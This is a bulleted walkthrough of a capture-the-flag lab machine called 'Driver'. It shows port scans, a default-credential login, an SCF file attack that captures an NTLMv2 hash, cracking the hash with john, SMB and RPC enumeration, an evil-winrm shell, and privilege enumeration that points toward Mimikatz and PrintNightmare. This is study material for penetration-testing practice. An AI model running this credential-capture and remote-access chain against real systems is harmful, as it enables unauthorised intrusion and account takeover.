Machine - Driver

Machine - Driver

• nmap sudo nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts
  • 80, 135, 445, 5985
• nmap nmap -sC -sV -p80,135,445,5985 10.10.11.106 -oN ports

80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2021-10-20T02:45:17
|_  start_date: 2021-10-20T01:04:23
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: mean: 7h15m07s, deviation: 0s, median: 7h15m07s

• fuzzing port 80
  • Images folder
• smb seems to be restricted
• fuzzing port 4985
  • nothing
• when going to port 80, is asking a basic auth
  • the server is reporting as MFP Firmware Update
  • the user/password is admin:admin
  • there is a page that allow to upload thingis
  • also the pages have php extension
  • let’s wfuzz with the credentials now
    • nothing interesting
• msrpc (135)
  • rpcdump.py IP
    • showed a lot of RPC endpoints..
  • tried rpcclient and smardump to ask things, but I need a user of the smb
• HINT :( → use SMB Share – SCF File Attacks
  • we got the result back

[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:59c20c5e0b3b1b80:1949578739EFD2DE8E3BD2D2E9EC775B:010100000000000026C9947767C5D7013E2061EAB9C8BF3F00000000020000000000000000000000

• with john john hashes.txt --wordlist=/usr/share/dict/rockyou.txt we got the password liltony
• with smbmap, we can now enumerate smbmap.py -u tony -p 'liltony' -d DRIVER -H 10.10.11.106

[+] IP: 10.10.11.106:445        Name: 10.10.11.106
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

• let’s see which files are in the IPC$

[+] IP: 10.10.11.106:445        Name: 10.10.11.106
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        IPC$                                                    READ ONLY
        .\IPC$\*
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 23:45:16 1600    lsass
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    scerpc
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-2c0-0
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    epmapper
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-1c0-0
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    eventlog
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-35c-0
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    atsvc
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-348-0
        fr--r--r--                4 Sun Dec 31 23:45:16 1600    spoolss
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-4d4-0
        fr--r--r--                8 Sun Dec 31 23:45:16 1600    wkssvc
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    trkwks
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-234-0
        fr--r--r--                6 Sun Dec 31 23:45:16 1600    srvsvc
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-23c-0
        fr--r--r--                2 Sun Dec 31 23:45:16 1600    MsFteWds
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    TDLN-3856-41
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    TDLN-1780-41
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    iisipmda2afe5a-1893-4d91-9622-8f1df9a8508d
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    iislogpipeef2b995f-4320-43a8-971e-077643546759
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    PSHost.132791730432182095.1068.DefaultAppDomain.wsmprovhost
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    IISFCGI-29c90af3-97f6-4028-8f4a-12e246f3c9b7

• Now that we have a smb access we can try to use the msrpc
• samrdump.py DRIVER/tony:liltony@10.10.11.106
• users in the system john, tony, Guest, Administrator
• now we can try to use evil-winrm
• evil-winrm -i 10.10.11.106 -u tony -p liltony
• and we got the shell as tony yay!!
• then we execute whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled

• let’s enumerate with winpeas
  • john is a administrator user
• let’s try now watson to see if there is vulnerabilities
  • didn’t work :(
• let’s try seatbelt
  • shows something weird

=== Checking for DPAPI Master Keys (Current User) ===

    Folder       : C:\Users\tony\AppData\Roaming\Microsoft\Protect\S-1-5-21-3114857038-1253923253-2196841645-1003

    MasterKey    : 75b6682f-d20b-4e4f-b333-2808ba01972c
        Accessed : 9/7/2021 11:50:08 PM
        Modified : 9/7/2021 11:50:08 PM

    MasterKey    : 78efb3d3-f3f1-4076-98d1-6e34190a5d86
        Accessed : 6/11/2021 7:01:02 AM
        Modified : 6/11/2021 7:01:02 AM

  [*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/rpc) to decrypt

• lets see what is this mimikatz…
• HINT → there is a exploit printnightmare-